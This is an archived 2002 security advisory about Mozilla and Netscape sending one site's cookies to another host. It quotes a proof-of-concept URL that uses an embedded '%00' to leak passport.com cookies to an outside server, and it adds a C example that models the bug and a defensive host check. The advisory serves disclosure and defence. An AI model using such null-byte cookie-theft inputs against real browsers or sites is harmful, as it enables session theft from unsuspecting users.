
Netscape/Mozilla leaks cookies
23rd Jan 2002 [SBWID-5020]
COMMAND

	Mozilla leaks cookies

SYSTEMS AFFECTED

	 Mozilla 0.9.5 build 2001111503 and 0.9.5 build 20011012 

	 Netscape 6.1 

PROBLEM

	In Marc Slemko's advisory [http://alive.znep.com/~marcs/security]:
	

	--snip--
	

	Loading a URL such as:
	

	http://alive.znep.com%00www.passport.com/cgi-bin/cookies

	

	...will cause Mozilla to connect to the hostname specified before the
	"%00", but send the cookies to the server based on the entire
	hostname. The "%00" is the URL encoded version of the null character,
	used in C to terminate strings.
	

	--snap--
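
	The mismatch described in the advisory, modelled as an added example (not Mozilla's code and not from the advisory): the decoded host is read once as a C string and once as a length-counted buffer, and a hardened check rejects any host where the two views differ. The function names and the `.passport.com` cookie domain are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

static int hexval(int c) {
    if (isdigit(c)) return c - '0';
    c = tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Percent-decode src into dst. Returns the decoded length (which may span
   embedded NUL bytes), or -1 on malformed input or overflow. */
long pct_decode(const char *src, char *dst, size_t cap) {
    size_t n = 0;
    while (*src) {
        int c = (unsigned char)*src++;
        if (c == '%') {
            int hi = hexval((unsigned char)src[0]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)src[1]);
            if (lo < 0) return -1;
            c = hi * 16 + lo;
            src += 2;
        }
        if (n + 1 >= cap) return -1;
        dst[n++] = (char)c;
    }
    dst[n] = '\0';
    return (long)n;
}

/* Length-aware suffix match standing in for a cookie-domain check (assumed model). */
int domain_match(const char *host, size_t len, const char *domain) {
    size_t dl = strlen(domain);
    return len >= dl && memcmp(host + len - dl, domain, dl) == 0;
}

/* Hardened check: reject a host whose C-string view is shorter than its decoded length. */
int host_is_safe(const char *host, size_t len) {
    return len > 0 && memchr(host, '\0', len) == NULL;
}

int main(void) {
    char host[64];
    /* Host portion of the URL quoted in the advisory. */
    long n = pct_decode("alive.znep.com%00www.passport.com", host, sizeof host);
    printf("C-string view: %s (%zu of %ld bytes)\n", host, strlen(host), n);
    printf("cookie match on full buffer: %d\n", domain_match(host, (size_t)n, ".passport.com"));
    printf("host_is_safe: %d\n", host_is_safe(host, (size_t)n));
    return 0;
}
```

	Running the host check before both name resolution and cookie selection ensures the two code paths can never act on different hostnames.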

SOLUTION

	Update to Netscape 6.2.1 or Mozilla 0.9.7
